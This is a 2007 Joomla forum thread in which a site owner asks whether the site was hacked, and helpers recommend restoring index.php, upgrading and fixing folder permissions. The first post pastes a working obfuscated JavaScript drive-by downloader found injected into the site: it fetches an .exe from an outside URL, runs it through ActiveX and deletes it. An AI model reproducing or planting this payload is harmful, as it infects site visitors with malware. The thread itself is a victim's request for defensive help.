Has my site been hacked?

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
stingray001
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Sun Mar 25, 2007 10:05 am

Has my site been hacked?

Post by stingray001 » Sun Dec 23, 2007 1:45 pm

Recently, when i visit my website, it shows a blank white page instead of the frontpage.
Upon looking at the source code, i found this:

Code: Select all

<script>
var dc=document.write;
var sc=String.fromCharCode;
var exe="http://www.freewebtown.com/aljn/tam.exe";
var file="run.exe";
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34) + file + sc(34,59,99,109,100,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,59,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,61,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32,108,110,61,34,65,100,111,34,59,118,97,114,32,108,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,101,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,122,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,46,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59,120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,59,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,46,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,122,104,97,110,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34,32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));
</script>
However, when i try accesing through another round-about URL(http://xxxx.xxxxxx.xxx//index.php/home) and my Admin panel, it seems fine.

I've checked my template HTML and CSS, but couldn't find that particular code.

I'm using Joomla 1.5RC 3 with RedEvo Aphelion - Joomla! 1.5 Template.

Can anyone who knows this thing please help me, cause this is pretty urgent, thanks!

Additional Info:
Apache version 1.3.39 (Unix)
PHP version 5.2.5
MySQL version 4.1.22-standard
Last edited by stingray001 on Sat Jan 05, 2008 10:53 am, edited 1 time in total.

debreczeniandras
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 153
Joined: Fri Sep 21, 2007 3:44 pm

Re: Has my site been hacked?

Post by debreczeniandras » Sun Dec 23, 2007 2:14 pm

Yes, you've been hacked.

Check - regularly - the FAQ page of Joomla!
http://help.joomla.org/component/option ... temid,268/

And especially this section: Where can I learn about vulnerable extensions?
http://help.joomla.org/component/option ... temid,268/

To quickly correct this error, simply replace the index.php found in your joomla root directory with the one you used at installation. (not the index.php in your template directory!!)
But please do consider upgrading:
Nightly build: http://dev.joomla.org/content/view/17/60/

Check proper file and directory permissions!
What are the recommended file and directory permissions?
http://help.joomla.org/component/option ... temid,268/

And start posting in the right forum.
Discussion regarding Joomla! 1.5 security issues.
http://forum.joomla.org/index.php/board,432.0.html

stingray001
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Sun Mar 25, 2007 10:05 am

Re: Has my site been hacked?

Post by stingray001 » Sun Dec 23, 2007 2:39 pm

Oh gosh...
I don't know whether it's Joomla fault, but i found a index.html document which carries the code in my website directory...

OK, opps seems like i'm so worried about it till i post it at the wrong section of the forum><
Kindly any mods help me shift this topic to the correct place please, sorry for the inconvenience.
Last edited by stingray001 on Sun Dec 23, 2007 2:47 pm, edited 1 time in total.

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 18870
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Has my site been hacked?

Post by infograf768 » Sun Dec 23, 2007 4:11 pm

stingray001 wrote:
I don't know whether it's Joomla fault,
I doubt so... it is usually not.
Jean-Marie Simonet / infograf · http://www.info-graf.fr
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14804
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Has my site been hacked?

Post by mandville » Sun Dec 23, 2007 9:36 pm

check all your folder permissions to ensure they are not 777.  notify the host for the bad script that they have a naughty user.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

stingray001
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Sun Mar 25, 2007 10:05 am

Re: Has my site been hacked?

Post by stingray001 » Mon Dec 24, 2007 7:34 am

mandville wrote: check all your folder permissions to ensure they are not 777.  notify the host for the bad script that they have a naughty user.
I found that the particular joomla folder was changed to permission 777 :(
Anyway, I've contacted the server admin so as to obtain information about the person.

By the way, I saw that people were able to track them using RAW Logs.
However, I don't read RAW Logs, so if i post them here, would anyone be willing to help me find out how the hacker attack my site?

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14804
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Has my site been hacked?

Post by mandville » Mon Dec 24, 2007 11:04 am

i ams sure someone will be able to assist but if you look around gor a free raw log reader online that would assist you in learning how to read them..
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}


Locked

Return to “Security in Joomla! 1.5”